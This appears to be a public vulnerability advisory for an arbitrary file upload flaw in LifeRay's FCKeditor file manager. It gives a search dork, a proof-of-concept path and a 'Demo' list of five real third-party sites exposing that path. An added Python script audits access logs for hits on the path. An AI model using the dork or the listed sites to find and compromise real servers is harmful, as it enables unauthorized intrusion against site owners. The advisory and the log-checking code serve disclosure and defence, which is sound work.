[+] Title: LifeRay CMS (Fckeditor) Arbitrary File Upload Vulnerability
[+] Date: 2020/04/10
[+] Author: h4shur
[+] Team: Persian Security Group
[+] Vendor Homepage: www.liferay.com
[+] Software Link: www.liferay.com
[+] Tested on: Windows 10
[+] Category: Web Application Bugs
[+] Dork: inurl:/web/guest/ inurl:/html/js/editor/fckeditor/

### Notes:

LifeRay allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications.

### POC:

[+] http://site/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html

### Demo:

[+] http://asd-ssg.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://www.ap239.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://franchise.hrblock.com.au/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://www.eof.gr/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://securefile.co/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html

### Special Thanks:

* Po0ri4 & b4ckdo0r

### Contact Me:

* Telegram: @h4shur
* Email: h4shursec@gmail.com
* Instagram: @netedit0r
* Twitter: @h4shur
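
### Added example: log check for the file manager path

This is an added example, not part of the original advisory or of Liferay's code. It shows how a site owner could audit web access logs for requests reaching the FCKeditor file manager path named in the POC. It assumes combined-format access logs; the function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from posixpath import normpath
from urllib.parse import unquote

# Path prefix taken from the POC URL in the advisory above.
FILEMANAGER_PREFIX = "/html/js/editor/fckeditor/editor/filemanager/"

# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def canonical_path(target):
    """Decode and normalise a request target so encoded or padded paths still match."""
    path = target.split("?", 1)[0]           # drop the query string
    for _ in range(2):                        # undo up to two layers of percent-encoding
        path = unquote(path)
    path = re.sub(r"/+", "/", path.replace("\\", "/"))
    # Lower-case because the advisory was tested on Windows (case-insensitive paths).
    return normpath(path).lower()

def find_filemanager_hits(lines):
    """Return {client_ip: [(timestamp, method, status, raw_target), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                          # not a parseable access-log line
        if (canonical_path(m["target"]) + "/").startswith(FILEMANAGER_PREFIX):
            hits[m["ip"]].append((m["ts"], m["method"], int(m["status"]), m["target"]))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2020:10:01:02 +0000] "GET /html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Apr/2020:10:01:09 +0000] "GET /HTML/js/editor/%66ckeditor/editor//filemanager/browser/default/browser.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [10/Apr/2020:10:02:00 +0000] "GET /web/guest/home HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [10/Apr/2020:10:02:01 +0000] "GET /html/js/editor/fckeditor/fckeditor.js HTTP/1.1" 200 7000 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Apr/2020:10:03:30 +0000] "GET /html/js/editor/fckeditor/editor/x/../filemanager/browser/default/browser.html?x=1 HTTP/1.1" 403 310 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for ip, events in find_filemanager_hits(SAMPLE_LOG).items():
        for ts, method, status, target in events:
            print(f"{ip} [{ts}] {method} {status} {target}")
```

A 200 status on these paths from an unauthenticated client means the file browser is exposed; a 403 or 404 means a block or removal is in effect.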